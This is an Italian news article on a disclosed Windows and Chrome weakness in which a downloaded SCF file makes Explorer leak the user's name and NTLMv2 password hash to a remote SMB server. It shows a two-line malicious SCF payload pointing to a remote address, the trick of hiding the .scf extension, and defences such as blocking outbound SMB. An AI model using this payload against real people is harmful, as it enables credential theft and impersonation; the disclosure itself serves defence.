Windows e Google Chrome sono un'accoppiata piuttosto popolare ma, stando a quanto ha rivelato Bosko Stankovic, anche pericolosa.

Stankovic, che si occupa di sicurezza per DefenseCode, ha scoperto che è possibile usare Chrome per rubare la password di Windows grazie a una falla nel sistema operativo.

Tutto ciò che un malintenzionato deve fare è convincere la propria vittima a visitare un sito che contenga un file SCF (Windows Explorer Shell Command File), un formato che risale ai tempi di Windows 98.

In sostanza, un file SCF è un file di testo con una sessione che indica il comando da eseguire e l'indicazione dell'icona da adottare, completa del percorso per recuperarla. Il contenuto è generalmente di questo tipo:

Articoli raccomandati:

Se la spia del computer fa la spia

Il malware che attacca le reti elettriche

I quindici malware più pericolosi della storia

Chiavetta USB con Stuxnet infettò centrale nucleare iraniana

[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

Il problema è l'icona: generalmente l'indicazione della posizione si riferisce a un file locale, ma si può indicare anche un server SMB remoto col quale Windows tenterà automaticamente l'autenticazione non appena l'utente tenterà di visualizzare il file scaricato, anche semplicemente aprendo la cartella con Windows Explorer.

Il malintenzionato ha bisogno soltanto che nel file SCF scaricato dalla vittima ci sia un contenuto simile al seguente:

[Shell]
IconFile=\\170.170.170.170\icon

Ovviamente, l'indirizzo remoto indicato deve essere quello del server SMB predisposto in ascolto.

Durante il tentativo automatico di autenticazione da parte del PC delle vittima, l'autore del file SCF può carpire il nome utente e l'hash NTLMv2 della password, per poi tentare di craccarlo in seguito oppure «per usarlo per accedere a servizi online che adoperino lo stesso tipo di autenticazione (per esempio Microsoft Exchange)» per impersonare la vittima senza nemmeno conoscere la password.

Tale tecnica d'attacco non è veramente nuova: è stata usata a suo tempo dal famigerato Stuxnet, che però per diffondersi adoperava i file LNK.

Proprio a causa di Stuxnet, Chrome è stato attrezzato per proteggere gli utenti dai file LNK, ma non dagli SCF. Inoltre, da allora Microsoft ha imposto ai file LNK di cercare l'icona soltanto nelle risorse locali.

«Impostare la posizione dell'icona a un server SMB remoto» - spiega Stankovic - «è un noto vettore d'attacco che sfrutta il sistema di autenticazione automatica di Windows quando si cerca di accedere a servizi come la condivisione di file remota».

C'è un ulteriore dettaglio da considerare: il ricercatore ricorda che in Windows Explorer i file SCF appaiono sempre senza l'indicazione dell'estensione, indipendentemente dalle impostazioni.

Ciò significa che «un file chiamato immagine.jpg.scf apparirà in Windows Explorer come immagine.jpg» e verrà quindi scambiato per un'innocua fotografia.

Allo stato attuale, tutte le versioni di Windows, compreso Windows 10, sono vulnerabili.

Per difendersi dall'attacco gli utenti possono disabilitare le connessioni SMB in uscita (porte TCP 139 e 445) dalla rete locale, agendo sulle impostazioni del firewall.

Secondo Stankovic, inoltre, è una buona idea disabilitare il download automatico in Google Chrome: in tal modo qualsiasi tentativo di download dovrà essere approvato dall'utente, che potrà rendersi conto di ogni comportamento sospetto.

Google, intanto, ha fatto sapere di stare lavorando su una patch.